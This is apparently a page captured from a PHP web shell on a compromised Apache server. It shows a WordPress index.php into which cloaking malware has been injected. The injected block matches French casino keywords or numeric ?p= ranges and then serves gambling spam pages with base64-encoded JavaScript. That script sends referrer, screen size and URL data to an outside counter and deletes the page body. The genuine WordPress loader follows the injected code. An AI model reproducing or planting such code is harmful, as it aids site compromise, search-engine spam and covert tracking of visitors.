|
Server IP : 109.234.165.82 / Your IP : 216.73.216.156 Web Server : Apache System : Linux poivre.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64 User : section52 ( 1135) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/section52/wcfa.lasection52.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
$title = 'Conseils Et Stratégies De Machines à Sous Qui Vous Aideront à Gagner';
$keys = <<<STR
casino,ligne,sous,gratuits,machines,roulette,jeux,bonus,argent,gagner,slots,jouer,dépôt,machine,pour,casinos,keno,comment,sans,avec,meilleur,réel,spins,gratuitsment,meilleurs,deposit,free,dans,blackjack,aucun,meilleure,meilleures,paiement,plus,paris,résultat,inscription,rami,gagnez,slot,résultats,conseils,france,soir,jouez,règle,application,chances,vous,français
STR;
$minMaxArr = [3396, 10307];
$keysArr = explode(',', $keys);
$request = rawurldecode($_SERVER["REQUEST_URI"]);
$matches = findMatches($request, $keysArr, $minMaxArr);
if ($matches) {
?>
<!DOCTYPE html>
<html>
<head>
<title><?php echo $title ?></title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<script src="data:text/javascript;base64,<?php echo base64_encode(getJs()) ?>"></script>
</head>
<body>
<div><?php echo $title ?></div>
</body>
</html>
<?php
exit;
}
function findMatches($request, $keysArr, $minMaxArr) {
foreach ($keysArr as $key) {
if (stristr($request, $key) !== false) {
return true;
}
}
if (preg_match('~\?p=(\d+)~', $request, $matches)) {
list ($min, $max) = $minMaxArr;
if ($matches[1] && inRange($min, $max, $matches[1])) {
return true;
}
}
return false;
}
function getJs() {
return <<<STR
new Image().src = "//counter.yadro.ru/hit;csnensch?r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random();
document.addEventListener("DOMContentLoaded", function (event) {
var bodyNode = document.getElementsByTagName('body')[0];
if (bodyNode) {
bodyNode.remove();
}
});
STR;
}
function inRange($min, $max, $value) {
return ($min <= $value) && ($value <= $max);
}
?>
<?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
wp();
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}